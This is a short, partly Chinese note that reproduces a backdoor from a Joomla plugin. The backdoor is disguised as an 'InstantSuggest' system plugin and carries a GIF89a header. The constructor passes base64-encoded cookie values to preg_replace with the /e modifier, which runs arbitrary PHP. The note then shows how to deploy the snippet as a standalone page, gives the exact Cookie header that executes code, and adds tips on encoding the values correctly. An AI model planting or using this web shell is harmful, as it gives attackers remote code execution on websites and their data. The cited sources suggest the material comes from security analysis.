http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html
GIF89a
/**
* @package Joomla.Plugin
* @subpackage system.instantsuggest
*
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
* @license GNU General Public License version 2 or later
*/
/**
* Instant Suggest Ajax
*
* @package Joomla.Plugin
* @subpackage system.instantsuggest
* @since 3.1
*/
class PlgSystemInstantSuggest
{
public function __construct() {
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
}
}
利用上述部分代码建立页面bk-001.php,
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
?>
发送下列cookie值,
Cookie: p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==
p3=base64_decode;
p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;
p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();
有写朋友可能喜欢使用Linux下的base64程序, 例如:
echo preg_replace | base64
得到的结果是cHJlZ19yZXBsYWNlCg==,致使上述代码(phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.